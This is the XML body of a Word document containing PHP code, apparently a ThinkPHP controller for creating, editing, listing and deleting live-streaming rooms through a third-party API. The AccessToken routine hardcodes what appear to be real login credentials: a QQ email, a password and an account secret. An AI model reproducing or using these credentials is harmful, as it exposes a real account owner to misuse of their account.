        <w:t>账户审核被拒绝，拒绝原因：</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'.$member['hidetent']];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10C4E4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C8F46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data);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F8F32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38E48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447A8CD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C7A26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52D0C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cho json_encode(['err'=&gt;'</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>会员不存在</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C4793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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30DF6B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619A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his-&gt;member=$member;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="204111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3AD9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post($url, $post_data,$token=null) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BC863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oken){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71B004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tions = array(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08AA63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 =&gt; array(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BC8F7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thod' =&gt; 'POST',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37D2B3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 =&gt; ['Content-type:application/json','Authorization:'.$token],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="294ED7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json_encode($post_data),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50BADC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out' =&gt; 15 * 60 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BB17C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2F27F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C24A3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4945A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options = array(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A5060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ttp' =&gt; array(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68892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thod' =&gt; 'POST',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70951A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ader' =&gt; 'Content-type:application/json',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="232AD7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json_encode($post_data),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D8C85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out' =&gt; 15 * 60 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52F112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56035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6F28B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1E294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xt = stream_context_create($options);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C5668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file_get_contents($this-&gt;url.$url, false, $context);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A041A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decode($result,true);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A758D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CCD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AccessToken(){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7ECD3A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 "1424445608@qq.com";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="223948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waini12";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AAB14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_data = array(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60450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ope"         =&gt; "app",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52D4BD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sername"      =&gt;  $username,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="468333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gt;  $password,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="326331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25C62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this-&gt;post('AccessToken', $post_data);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D3174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result['accessToken'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D48C7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 = "22001331";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C1000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 "p1cU2G";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D0013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post_data = array(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46EBD3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cope"=&gt; "room",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="600A8F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    =&gt;  $roomId, </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="102850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ssword"  =&gt;  $password,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75B145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ecretKey" =&gt;  md5($roomId.$password.$this-&gt;accessSecret), </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CC72E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ickName"  =&gt;  "</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>张三</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70605D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ount"   =&gt;  "" </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BF070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2694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ult = $this-&gt;post('AccessToken', $post_data);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D2CC66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ump($result);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69C449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A5750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Rooms($a=[]){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72B3F2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7C609C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empty($a['type'])  ? $a['type']  : 0, </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="215F9C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ndex" =&gt; !empty($a['type']) ? $a['index'] : 0,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BF4A3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unt" =&gt; !empty($a['type']) ? $a['count'] : 10</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="231F40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10C6CF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array_merge($data,$a);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54BE32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GetRooms',$data,$this-&gt;AccessToken());</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FA902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31D601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7A11C0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1608DF4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6D6A1E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B1A42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6A75A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CreateRoom($post=[]){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="643104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zhibo')-&gt;where(['uid'=&gt;$this-&gt;member['id']])-&gt;find();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="478590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6A09BE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 = input('post.');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12D01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54D503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data</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>字段不能为空</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>','msg'=&gt;'data</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>字段不能为空</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AF023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99CBDE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4D2D76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roomId']      =   $db['roomId'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64342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roomName']    =   $post['roomName'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40275F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type_id']     =   $post['type_id'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="417AE3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img_l']       =   $post['img_l'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2277123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img_r']       =   $post['img_r'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D0200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ist = json_decode($this-&gt;ModifyRoom($add),true);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60E57C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empty($list['ret'])){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EF4BD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db]);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E1F30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DA5FD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msg'=&gt;$list]);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23EE56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7E29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list]);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="480D79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8014E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283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3C45B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EFA4E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w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>该用户直播已存在</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>','msg'=&gt;'</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>该用户直播已存在</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="239CA9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C297A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6E42DB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roomName' =&gt; 'require|max:100|length:3,100', 'type_id' =&gt; 'number|require', 'img_l' =&gt; 'require','img_r' =&gt; 'require']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15EB0A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post)) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="750928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 =&gt; $validate-&gt;getError() ]));;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B7580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5C2D5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roomName']   =   $post['roomName'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E96AD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nchorPwd']  =   !empty($post['anchorPwd'])  ? $post['anchorPwd']    : $this-&gt;member['id'].rand(100000,9999999);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="758B33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ssistPwd']  =   !empty($post['assistPwd'])  ? $post['assistPwd']    : $this-&gt;member['id'].rand(100000,9999999);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7833AB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userPwd']    =   !empty($post['userPwd'])    ? $post['userPwd']      : $this-&gt;member['id'].rand(100000,9999999);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7140BB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reator']    =   '';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B6E1B3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maxOnlineNum']=  0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A180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anchorDesc'] =   '';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7732E2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contentDesc']=   '';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="761BB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thirdRoomId']=   '';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20A9608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1 = Db::name('member_zhibo_type')-&gt;cache(true)-&gt;find($post['type_id']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CE84D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2 = Db::name('member_zhibo_type')-&gt;cache(true)-&gt;find($type_1['tid']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16FD34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firstIndustry']=     $type_2['title'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AC744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secondIndustry']=    $type_1['title'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="198DEF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CreateRoom',$data,$this-&gt;AccessToken());</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="753718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5DADD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7032B9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res['entity'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6511AF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roomName']        =   $res['roomName'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7283B5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anchorPwd']       =   $res['anchorPwd'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41D8AA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assistPwd']       =   $res['assistPwd'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3015C1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userPwd']         =   $res['userPwd'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DB764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anchorDesc']      =   $res['anchorDesc'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F9D3C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contentDesc']     =   $res['contentDesc'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E24E3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creator']         =   $res['creator'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="082C99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maxOnlineNum']    =   $res['maxOnlineNum'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="320407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firstIndustry']   =   $res['firstIndustry'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FA5A7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secondIndustry']  =   $res['secondIndustry'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7128BD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roomId']          =   $res['roomId'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42F859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create_time']     =   $time;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C8733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update_time']     =   $time;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79E28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img_l']           =   $post['img_l'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="016D3C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img_r']           =   $post['img_r'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56B465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uid']             =   $this-&gt;member['id'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6196D3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type_id']         =   $post['type_id'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7229ED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dd['des']             =   50;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D7A2E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_zhibo')-&gt;insert($add);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="636624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609D4C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D93115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5E0C18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103C3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87B6C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typename(){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="120B0D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data = Db::name('member_zhibo_type')-&gt;where('tid',0)-&gt;order('des desc')-&gt;cache(true)-&gt;select();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D17BD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22CF8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data'] = Db::name('member_zhibo_type')-&gt;where('tid',$v['id'])-&gt;order('des desc')-&gt;cache(true)-&gt;select();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DFC03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197C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data);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24D098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17040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DelRoom($id){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A61B0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10B2CB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 =&gt; $id</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="362B83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E6A5D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DelRoom',$data,$this-&gt;AccessToken());</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1190ED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7FF091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4B11DD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77641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5EBDE7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65807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A1324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RoomsLiveInfo($ids){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B5C39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1C237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s' =&gt; $ids</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16DB3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2BD84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GetRoomsLiveInfo',$data,$this-&gt;AccessToken());</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B910C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36948B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7BBF4C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4EF76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21A01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5708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997F7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ClientUrls($id){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="760FB4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537AB52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 =&gt; $id</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25848A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8D4B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GetClientUrls',$data,$this-&gt;AccessToken());</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="443DB0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0DA74B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660937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0A9F87E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252E14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3E361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53207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GetRoom($id){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B6944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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30837E9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oomId' =&gt; $id</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F9B67E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7EED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GetRoom',$data,$this-&gt;AccessToken());</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="305A1C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0C15347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248AE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7FE079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61A07A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4933F7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7FF6BF3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ModifyRoom($post){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3813E0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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D8DF3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data</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>字段不能为空</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79B5F0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C882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post['roomId']){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E4E508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oomId</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>房间号</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>ID</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>不能为空</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D7440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D6B4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validate = new Validate(['roomName' =&gt; 'require|max:100|length:3,100', 'type_id' =&gt; 'number|require', 'img_l' =&gt; 'require','img_r' =&gt; 'require']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AD02A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 (!$validate-&gt;check($post)) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EEF7E6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it(json_encode(['err' =&gt; $validate-&gt;getError() ]));;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34D219A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B2DFC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1 = Db::name('member_zhibo_type')-&gt;cache(true)-&gt;find($post['type_id']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E4BBB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2 = Db::name('member_zhibo_type')-&gt;cache(true)-&gt;find($type_1['tid']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A51D8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firstIndustry']=     $type_2['title'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20F416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secondIndustry']=    $type_1['title'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F0AA9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s = $this-&gt;post('ModifyRoom',$post,$this-&gt;AccessToken());</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67158A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 = time();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="407A21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res['status'] == '200'){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="286230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ost['update_time'] = time();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59E075F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 = Db::name('member_zhibo')-&gt;where(['roomId'=&gt;$post['roomId'],'uid'=&gt;$this-&gt;member['id']])-&gt;update($post);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="131B33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a){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="159CC8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member_zhibo</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>表修改数据失败，用户</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>ID'.$this-&gt;member['uid']]);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ACF62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10075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ret'=&gt;$res]);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49A1B6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5BEA46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_encode(['err'=&gt;$res,'msg'=&gt;$this-&gt;msg($res['status'])]);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45B25BE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67DBB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933D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info(){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B9A96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zhibo')-&gt;where(['uid'=&gt;$this-&gt;member['id']])-&gt;find();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="648CD13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094233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Db::name('member_zhibo_type')-&gt;cache(true)-&gt;find($db['type_id']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BC1B7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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="619BB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type_title'] = $type['title'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E88BA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E649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db]);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04813AD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CBC32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p>
    <w:p w14:paraId="0AF8F8F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C7324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529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vate function msg($id){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5441EF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p>
    <w:p w14:paraId="0087A2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id) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E6408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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E98DE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调用成功</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="198A00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5E3ECE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ase 401:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A9274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认证失败</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>无效的</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>token';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F7B4E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4888D36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417:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4423AE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接口超过每天</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>room</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>最大访问次数</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27EA3D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603E23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419:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AD4EF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接口超过每天</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>app</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>最大访问次数</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65FD08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373A6D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420:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5789E6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没有权限访问此资源</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="606A4C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6908AE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001:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D1FCF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无效的录播</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>id';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="187A3E8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24BC93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003:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7170E8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无效的录播时间</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>三天前的录播不能生成</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1393AA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230A49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005:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CA59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无效的开始录播时间</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>开始时间不能在最后一次调用时间之前</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5805CF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1E5F9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1:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E9F79A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无效的主播室</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>ID';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="670BFE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22A6D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2:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40B7FC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主播室不存在</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D683A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29917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3:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="563291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room password </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>重复</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
